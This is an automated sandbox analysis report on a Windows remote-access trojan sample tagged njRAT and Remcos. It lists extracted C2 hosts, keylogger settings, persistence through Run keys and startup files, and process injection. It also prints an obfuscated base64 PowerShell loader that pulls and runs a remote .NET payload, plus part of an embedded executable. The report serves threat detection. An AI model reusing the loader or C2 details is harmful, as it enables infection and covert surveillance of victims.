njrat | 1c9708a7c1cca2ffb1fb6711828553521a81c313bd3dcefba441e546d2457e5d

Analysis

max time kernel
167s
max time network
178s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
09/07/2023, 10:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CARPETADEFOLIOYACTAENTREG.exe
Size

1.3MB
MD5

f078c4f43ad9bd1eaf54946c84fdb78e
SHA1

9d3f4a0595af9c10731ea2e9f198c462b2d73dec
SHA256

1c9708a7c1cca2ffb1fb6711828553521a81c313bd3dcefba441e546d2457e5d
SHA512

079b649c6fd09a8df4b7cd032b6edd8b555948d5cac47a18afe3aa44b0ef1aa937ed3bb4f1b2108577a237181cd66055c71f7a21c84b8453c3ab3b83d55f72a1
SSDEEP

24576:9VgmnudJ41JhQdiZoGDbbtadASRTcibq/7dTYpzWRuhIDTAekW:9VSr42+vtMZNDbydTQWRuaDTJX

Score

10^/10

njrat remcos matarifejulio6 nyan cat persistence rat trojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

nj0509.duckdns.org:0509

Mutex

6ce9672712ba4490be

Attributes

reg_key
6ce9672712ba4490be
splitter
@!#&^%$

Extracted

Family

remcos

Botnet

matarifeJULIO6

matarife.duckdns.org:2798

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
20
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
true
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KM2G8Z
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
22	4464	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
Key value queried	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation	CARPETADEFOLIOYACTAENTREG.exe

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrnjhdf.exe	Powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe	Powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe	Powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe	Powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrnjhdf.exe	Powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr
1624	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
2868	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
3144	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
4968	remcos.exe
2676	remcos.exe
812	remcos.exe
1056	remcos.exe
3568	remcos.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Windows\\Temp\\Debug.vbs"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Windows\CurrentVersion\Run\	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KM2G8Z = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
Key created	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Software\Microsoft\Windows\CurrentVersion\Run\	remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KM2G8Z = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	remcos.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4828 set thread context of 3320	4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr	103
PID 4536 set thread context of 3144	4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr	108
PID 4464 set thread context of 3628	4464	powershell.exe	109
PID 4968 set thread context of 3568	4968	remcos.exe	120

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000_Classes\Local Settings	CARPETADEFOLIOYACTAENTREG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2724	powershell.exe
2724	powershell.exe
3292	Powershell.exe
2672	Powershell.exe
4464	powershell.exe
3292	Powershell.exe
2672	Powershell.exe
4464	powershell.exe
4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
3312	powershell.exe
3312	powershell.exe
3312	powershell.exe
4968	remcos.exe
4968	remcos.exe
4968	remcos.exe
4968	remcos.exe
4968	remcos.exe
4968	remcos.exe
3204	Powershell.exe
3204	Powershell.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	3292	Powershell.exe
Token: SeDebugPrivilege	2672	Powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr
Token: SeDebugPrivilege	4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	4968	remcos.exe
Token: SeDebugPrivilege	3204	Powershell.exe
Token: SeDebugPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe
Token: 33	3320	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3320	InstallUtil.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4436	AcroRd32.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
4436	AcroRd32.exe
3568	remcos.exe
4436	AcroRd32.exe
4436	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3356 wrote to memory of 4536	3356	CARPETADEFOLIOYACTAENTREG.exe	86
PID 3356 wrote to memory of 4536	3356	CARPETADEFOLIOYACTAENTREG.exe	86
PID 3356 wrote to memory of 4536	3356	CARPETADEFOLIOYACTAENTREG.exe	86
PID 3356 wrote to memory of 3332	3356	CARPETADEFOLIOYACTAENTREG.exe	88
PID 3356 wrote to memory of 3332	3356	CARPETADEFOLIOYACTAENTREG.exe	88
PID 3356 wrote to memory of 3332	3356	CARPETADEFOLIOYACTAENTREG.exe	88
PID 3356 wrote to memory of 4828	3356	CARPETADEFOLIOYACTAENTREG.exe	89
PID 3356 wrote to memory of 4828	3356	CARPETADEFOLIOYACTAENTREG.exe	89
PID 3356 wrote to memory of 4828	3356	CARPETADEFOLIOYACTAENTREG.exe	89
PID 3356 wrote to memory of 4436	3356	CARPETADEFOLIOYACTAENTREG.exe	90
PID 3356 wrote to memory of 4436	3356	CARPETADEFOLIOYACTAENTREG.exe	90
PID 3356 wrote to memory of 4436	3356	CARPETADEFOLIOYACTAENTREG.exe	90
PID 3332 wrote to memory of 2724	3332	WScript.exe	91
PID 3332 wrote to memory of 2724	3332	WScript.exe	91
PID 3332 wrote to memory of 2724	3332	WScript.exe	91
PID 4828 wrote to memory of 3292	4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr	93
PID 4828 wrote to memory of 3292	4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr	93
PID 4828 wrote to memory of 3292	4828	CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr	93
PID 4536 wrote to memory of 2672	4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr	95
PID 4536 wrote to memory of 2672	4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr	95
PID 4536 wrote to memory of 2672	4536	CARPETA DE FOLIO Y ACTA ENTREGADA.scr	95
PID 2724 wrote to memory of 4464	2724	powershell.exe	97
PID 2724 wrote to memory of 4464	2724	powershell.exe	97
PID 2724 wrote to memory of 4464	2724	powershell.exe	97
PID 4436 wrote to memory of 4516	4436	AcroRd32.exe	98
PID 4436 wrote to memory of 4516	4436	AcroRd32.exe	98
PID 4436 wrote to memory of 4516	4436	AcroRd32.exe	98
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99
PID 4516 wrote to memory of 4612	4516	RdrCEF.exe	99

C:\Users\Admin\AppData\Local\Temp\CARPETADEFOLIOYACTAENTREG.exe
"C:\Users\Admin\AppData\Local\Temp\CARPETADEFOLIOYACTAENTREG.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr
  "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr" /S
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe'
    3⤵
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- - C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr
    "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr"
    3⤵
    - Executes dropped EXE
    PID:1624
- - C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr
    "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr"
    3⤵
    - Executes dropped EXE
    PID:2868
- - C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr
    "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies registry class
    PID:3144
  - - C:\ProgramData\Remcos\remcos.exe
      "C:\ProgramData\Remcos\remcos.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\ProgramData\Remcos\remcos.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe'
        5⤵
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3204
    - - C:\ProgramData\Remcos\remcos.exe
        
        "C:\ProgramData\Remcos\remcos.exe"
        5⤵
        Executes dropped EXE
        
        PID:2676
    - - C:\ProgramData\Remcos\remcos.exe
        
        "C:\ProgramData\Remcos\remcos.exe"
        5⤵
        Executes dropped EXE
        
        PID:812
    - - C:\ProgramData\Remcos\remcos.exe
        
        "C:\ProgramData\Remcos\remcos.exe"
        5⤵
        Executes dropped EXE
        
        PID:1056
    - - C:\ProgramData\Remcos\remcos.exe
        
        "C:\ProgramData\Remcos\remcos.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:3568
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J❤BM❤Eg❤ZwBL❤C❤❤PQ❤g❤Cc❤JQBJ❤Gc❤aQBJ❤Gs❤JQ❤n❤Ds❤WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤Bm❤HU❤VQBO❤C❤❤PQ❤g❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBD❤G8❤bgB2❤GU❤cgB0❤F0❤Og❤6❤EY❤cgBv❤G0❤QgBh❤HM❤ZQ❤2❤DQ❤UwB0❤HI❤aQBu❤Gc❤K❤❤g❤CQ❤T❤BI❤Gc❤Sw❤u❤HI❤ZQBw❤Gw❤YQBj❤GU❤K❤❤n❤CcyojLC❤yc❤L❤❤n❤EE❤Jw❤p❤C❤❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤ZgB1❤FU❤Tg❤p❤C4❤RwBl❤HQ❤V❤B5❤H❤❤ZQ❤o❤Cc❤QwBs❤GE❤cwBz❤Ew❤aQBi❤HI❤YQBy❤Hk❤Mw❤u❤EM❤b❤Bh❤HM❤cw❤x❤Cc❤KQ❤u❤Ec❤ZQB0❤E0❤ZQB0❤Gg❤bwBk❤Cg❤JwBS❤HU❤bg❤n❤Ck❤LgBJ❤G4❤dgBv❤Gs❤ZQ❤o❤CQ❤bgB1❤Gw❤b❤❤s❤C❤❤WwBv❤GI❤agBl❤GM❤d❤Bb❤F0❤XQ❤g❤Cg❤JwB0❤Hg❤d❤❤u❤Go❤bg❤5❤D❤❤NQ❤w❤C8❤Nw❤5❤DQ❤M❤❤0❤DM❤NQ❤0❤Dk❤Ng❤x❤DQ❤NQ❤2❤DU❤Ng❤y❤DE❤MQ❤v❤D❤❤N❤❤3❤DU❤M❤❤0❤Dk❤N❤❤1❤D❤❤Mw❤2❤Dk❤OQ❤w❤DM❤MQ❤x❤DE❤LwBz❤HQ❤bgBl❤G0❤a❤Bj❤GE❤d❤B0❤GE❤LwBt❤G8❤Yw❤u❤H❤❤c❤Bh❤GQ❤cgBv❤GM❤cwBp❤GQ❤LgBu❤GQ❤Yw❤v❤C8❤OgBz❤H❤❤d❤B0❤Gg❤Jw❤p❤Ck❤';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%IgiIk%','TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAN2VK9EAAAAAAAAAAOAAIiALAVAAAFAAAAAGAAAAAAAAZm8AAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABFvAABPAAAAAIAAAJgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAABobgAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAbE8AAAAgAAAAUAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgDAAAAgAAAAAQAAABSAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAAVgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABFbwAAAAAAAEgAAAACAAUAFCQAAGwZAAABAAAAAAAAAIA9AADoMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKBcAAAoqJgACKBgAAAoAKqZzGQAACoABAAAEcxoAAAqAAgAABHMbAAAKgAMAAARzHAAACoAEAAAEKhMwAQAQAAAAAQAAEQB+AQAABG8dAAAKCisABioTMAEAEAAAAAIAABEAfgIAAARvHgAACgorAAYqEzABABAAAAADAAARAH4DAAAEbx8AAAoKKwAGKhMwAQAQAAAABAAAEQB+BAAABG8gAAAKCisABioTMAIAPAAAAAUAABEAfgUAAAQUKCEAAAoLBywhcgEAAHDQBQAAAigiAAAKbyMAAApzJAAACgwIgAUAAAQAAH4FAAAECisABioTMAEACwAAAAYAABEAfgYAAAQKKwAGKiIAAoAGAAAEKhMwAwAmAAAABwAAEQAoCAAABnIxAABwfgYAAARvJQAACigmAAAKCwd0BQAAGworAAYqVnMNAAAGKCcAAAp0BgAAAoAHAAAEKh4CKCgAAAoqEzABAAsAAAAIAAARAH4HAAAECisABioAEzABAAsAAAAIAAARACgOAAAGCisABioeAigpAAAKKgAbMAcABgEAAAkAABEAAHJNAABwKCoAAAoNCSwDACtFAHMrAAAKEwRzLAAAChMFEQUXby0AAAoAEQVygQAAcG8uAAAKABEFcvUAAHBvLwAACgARBBEFbzAAAAoAEQRvMQAACiYAfjIAAApymgEAcBdvMwAACgoGcvYBAHByTQAAcG80AAAKAAZvNQAACgBzNgAACgIoNwAACig4AAAKCwcoNwAACgtyCAIAcAwIck4CAHAoOQAACgwoOgAACigLAAAGbzsAAApyZgIAcG88AAAKcpACAHBvPQAAChQYjRcAAAElFghymAIAcCg5AAAKoiUXByg+AAAKom8/AAAKJt4QJShAAAAKEwYAKEEAAAreAAAqAAABEAAAAAABAPP0ABAlAAABEzACABIAAAAKAAARAAIDKCYAAAooQgAACgorAAYqAAATMAEADAAAAAsAABEAAihDAAAKCisABioTMAEAEAAAAAwAABEA0AkAAAIoIgAACgorAAYqEzABAAwAAAANAAARAAIoRAAACgorAAYqEzACAB0AAAAOAAARAAKMBgAAGxT+AQsHLAgoAQAAKworBQACCisABiomAAP+FQYAABsqJgACKCkAAAoAKgAAABMwAgA1AAAADwAAEQACe0YAAApvRwAACgsHjAkAABsU/gEMCCwUKAIAACsLAntGAAAKB29IAAAKAAAABworAAYqUgACKCkAAAoAAnNJAAAKfUYAAAoqAABCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAB0CAAAI34AAOAIAAAcCQAAI1N0cmluZ3MAAAAA/BEAALACAAAjVVMArBQAABAAAAAjR1VJRAAAALwUAACwBAAAI0Jsb2IAAAAAAAAAAgAAAVcVogkJDwAAAPoBMwAWAAABAAAANQAAAAoAAAAIAAAAGgAAAAUAAABJAAAAQAAAAA8AAAAFAAAACgAAAAsAAAAJAAAAAQAAAAMAAAABAAAAAgAAAAMAAAACAAAAAADuBAEAAAAAAAYAtAObBwYAIQSbBwYAiwLcBg8ACQgAAAYAzAKUBQYAlwOUBQYACASUBQYA1AOUBQYA7QOUBQYAEwOUBQYAuAJVBwYANAJVBwYAXwOUBQYALgNrBAoAVwJeBgoABALYBAoAnwLYBA4AywErBw4AmgbvBgYARwPcBg4A4wJ0Bw4A+wK6AAYAfggABQ4AhgYrBw4AfAO6AAYAkwEABQ4AAQCuBAoAQgITBQYAbgLcBgYAGQKbBwYATga7BwYAvwV/BQoA2wFqBQYA5AhEAAoAVwjcBgoA2QXcBgYApgUABQYANwEABQYA9AiUBQYASAibBwoA5gFqBQYAWwFyAAoAcAHcBgYA/QhEAAoApgiPCA4AGAi6AAYApwQABQYAMAUABQYAtAWUBQYAtggABQYAwAGUBQ4ApQB0BwYAxQYABQAAAABiAAAAAAABAAEAAAAAAFwFyAhJAAEAAQAAAAAAmAbICE0AAQACAAABEACFCMgIXQABAAMAAAEAAN0HzAddAAUACAAAARAALQjICIUABwAMAAABAAAGCcgIXQAIAA8AAQAAACsAVABdAAgAEAAFAQAAHQcAAF0ACAASAAUBAAAQAAAAXQAIABkAMQATBqABMQDqBagBMQD+BbABMQAsBrgBEQAHBcABEQCwAcQBEQALAckBIQC+CHEBUCAAAAAABhjPBgYAAQBYIAAAAAAGGM8GBgABAGIgAAAAABEY1QYsAQEAjCAAAAAAEwiLBs0BAQCoIAAAAAATCEwF0gEBAMQgAAAAABMIdgbXAQEA4CAAAAAAEwgNB9wBAQD8IAAAAAATCEoG4QEBAEQhAAAAABMImAHmAQEAWyEAAAAAEwikAewBAQBkIQAAAAATCDIA8wECAJYhAAAAABEY1QYsAQIArCEAAAAABhjPBgYAAgC0IQAAAAAWCJoI+AECAMwhAAAAABMIIAj4AQIA4yEAAAAABhjPBgYAAgDsIQAAAAAWALAF/QECABAjAAAAAMYCQQg0AQMAMCMAAAAAxgIkAT0BBABIIwAAAACDAJABAgIEAGQjAAAAAMYCpQRKAQQAfCMAAAAAEQCSAAcCBAClIwAAAAABAH4ADwIFAK8jAAAAAAYYzwYGAAYAvCMAAAAAAwj7AE8ABgD9IwAAAAAGGM8GBgAGAAAAAQBlBAAAAQBrAAAAAQDoBQAAAQAbAQAAAQAbAQkAzwYBABEAzwYGABkAzwYKACkAzwYQADEAzwYQADkAzwYQAEEAzwYQAEkAzwYQAFEAzwYQAFkAzwYVAGEAzwYQAGkAzwYQAHEAzwYQAHkAzwYaAIkAzwYgAKEAzwYGAKkAzwYGALEAzwYGAMkAzwYmAOEAzwYQAOkAzwYGAPEAzwYGAJEAzwYGAJkAzwYGAAwAzwYGABQAzwYGABwAzwYGACQAzwYGAAwA+wBPABQA+wBPABwA+wBPACQA+wBPALkAOAhrANEASQFxANEA8Ah5APkAzwZ/APkAewiTAEEBUwSbAEkB1QCjAAkBzwYGALkAzwYGAFEBbQjDABkBzwYGACEBzwYGACEBYAHIACEBgwEQACEBXwgQABkBywXPABkBsAjWAGEBfwbaABEB2QjfABEBYgTnABEB8wEGAGkBzwYGAHEB+QHtAGkBlgTyAHkBdAj3AIEBOgX9AIEB0AADATkBkAELAdEA4gARAZEBhQQYAZkBMAEeAaEBtQYlAaEBowYsAbkAQQg0AbkAJAE9AbkApQRKAakB7ABXATwAvghxAUQAPwRPAEQASQSIAUQAzwYGACkAowBWBC4ACwBFAi4AEwBOAi4AGwBtAi4AIwB2Ai4AKwCJAi4AMwCJAi4AOwB2Ai4AQwCPAi4ASwCJAi4AUwCJAi4AWwCnAi4AYwDRAi4AawDeAkAAgwAoA0AAewAtA0MAcwA2A0MAewAtA0kAowBnBGMAcwA2A2MAewAtA2kAowB7BIAAgwAoA4MAiwAoA4MAkwAoA4MAcwA2A4kAowCIBKAAgwAoA6MAiwAoA6MAcwBPA6MAqwAoA6MAswAoA6MAkwAoA6kAewDrA8AAgwAoA8MAswAoA8MAcwCRA8MAewDrA8kAewDrA+AAgwAoA+MAiwAoA+MAkwAoA+MAqwAoA+MAswAoAyMBewAtAyMBmwD0AykBowCcBEMBewAtA0MBUwCJAkACewAtA0ACgwAoA2ACewAtA2ACgwAoA4ACewAtA4ACgwAoA6ACewAtA6ACgwAoA8ACgwAoA+ACgwAoAwADgwAoAwADewAtAyADgwAoA0ADgwAoA0ADewAtA0oAVA